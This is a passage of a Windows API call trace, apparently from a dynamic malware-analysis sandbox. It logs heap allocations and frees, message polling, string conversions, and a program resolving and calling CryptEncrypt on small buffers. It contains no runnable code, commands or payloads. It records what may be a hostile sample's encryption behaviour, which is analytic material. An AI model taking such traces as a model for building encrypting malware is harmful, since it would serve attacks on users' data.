dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9d68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0254.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.792] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.792] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x200) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.795] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.795] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.796] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.796] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.796] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.797] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24f45c8*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x200 | out: pbData=0x24f45c8*, pdwDataLen=0x8bef68*=0x200) returned 1 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.799] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.799] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.799] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.799] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.800] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.800] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.800] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.801] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.801] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.801] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 